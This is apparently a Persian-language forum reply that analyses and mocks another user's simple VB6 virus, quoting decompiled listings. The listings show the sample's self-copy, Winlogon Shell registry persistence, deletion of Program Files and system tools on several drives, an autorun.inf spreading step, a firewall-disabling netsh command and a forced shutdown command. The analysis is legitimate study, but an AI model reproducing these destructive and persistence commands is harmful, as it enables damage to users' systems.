من سورسی ندیدم
دوست عزیز من هیچی بلد نیستما قصد اهانتی هم بهت ندارم فقط میخوام انالیز کنم همین
ویروس بالا از 4 api استفاده میکنه به اسم
کد:
Private Declare Function DestroyWindow Lib "user32" Alias "DestroyWindow" (ByVal hwnd As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
امده از دستور shell برای خاموش کردن سیستم استفاده کرده :
کد:
"shutdown -s -t 4 -c SMTvir'#39's_saying_goodbye"
5 تا تایمر داره که میشه تایمرهاش رو kill کرد.
خودشو کی میکنه تو درایو c
کد:
loc_00402FC5: FileCopy MSVBVM60.DLL.__vbaStrVarVal("", "", "c:\start up.exe"), %x2
بعد امده یه کلید ساده رجیستری
در نظر گرفته در این ادرس
کد:
loc_00403008: call MSVBVM60.DLL.__vbaVarSetVar("", CreateObject("wscript.shell", 00000000h))
loc_00403015: var_0000008C = 8
loc_0040302D: var_00000084 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
و امده اسم درایوها تک به تک نوشته و فایلهای زیرو پاک میکنه
کد:
loc_004030BA: var_00000084 = "C:\Program Files"
loc_004030D5: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004030D8: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004030E4: var_0000008C = 8
loc_004030F9: var_00000084 = &H4021F4
loc_00403114: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403117: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403123: var_0000008C = 8
loc_00403138: var_00000084 = "E:\Program Files"
loc_00403153: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403156: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403162: var_0000008C = 8
loc_00403177: var_00000084 = "F:\Program Files"
loc_00403192: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403195: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004031A1: var_0000008C = 8
loc_004031B6: var_00000084 = "C:\WordPad.exe"
loc_004031D1: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004031D4: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004031E0: var_0000008C = 8
loc_004031F5: var_00000084 = &H402290
loc_00403210: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403213: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040321F: var_0000008C = 8
loc_00403234: var_00000084 = "E:\WordPad.exe"
loc_0040324F: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403252: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403263: var_0000008C = 8
loc_00403269: var_00000084 = "F:\WordPad.exe"
loc_0040328E: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403291: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040329D: var_0000008C = 8
loc_004032B2: var_00000084 = "C:\NotePad.exe"
loc_004032CD: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004032D0: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004032DC: var_0000008C = 8
loc_004032F1: var_00000084 = &H402320
loc_0040330C: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040330F: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040331B: var_0000008C = 8
loc_00403330: var_00000084 = "E:\NotePad.exe"
loc_0040334B: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040334E: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040335D: var_00000084 = "F:\NotePad.exe"
loc_00403363: var_0000008C = 8
loc_0040338A: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040338D: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403399: var_0000008C = 8
loc_004033AE: var_00000084 = "C:\Calculator.exe"
loc_004033C9: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004033CC: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004033D8: var_0000008C = 8
loc_004033ED: var_00000084 = &H4023B4
loc_00403408: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040340B: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403417: var_0000008C = 8
loc_0040342C: var_00000084 = "E:\Calculator.exe"
loc_00403447: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040344A: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403456: var_0000008C = 8
loc_00403469: var_00000084 = "F:\Calculator.exe"
loc_00403486: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403489: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403495: var_0000008C = 8
loc_004034AA: var_00000084 = "C:\Paint.exe"
loc_004034C5: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004034C8: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004034D4: var_0000008C = 8
loc_004034E9: var_00000084 = &H40244C
loc_00403504: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403507: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403513: var_0000008C = 8
loc_00403528: var_00000084 = "E:\Paint.exe"
loc_00403543: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403546: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403552: var_0000008C = 8
loc_00403567: var_00000084 = "F:\Paint.exe"
loc_00403582: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403585: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
همینجا زدم زیر خنده :-)
بعد اتوران گفته داره (اسم تک تک درایوها رو نوشته میتونستی با حلقه و کنترل drive لیست درایوها بدست بیاری !
کد:
loc_00404A37: call &("13#1", "[autorun]")
loc_00404A42: call MSVBVM60.DLL.__vbaStrMove
loc_00404A4E: call &("open=virus.exe", MSVBVM60.DLL.__vbaStrMove)
loc_00404A59: call MSVBVM60.DLL.__vbaStrMove
بعدش گفته فایروالو غیر فعال کرده راست میگه
کد:
loc_00402E27: var_00000084 = "netsh firewall set opmode disable"
loc_00402E31: var_0000008C = 8
loc_00402E3B: var_7C = "netsh firewall set opmode disable"
البته سورس هم از اینجا گرفته
کد:
http://www.google.com/#q=netsh+firewall+set+opmode+disable+vb6&bih=532&biw=1345&fp=46c85a59d0d13eb3&hl=fa
در ک 134 ثانیه از وقتم حروم شد :-)
موفق باشید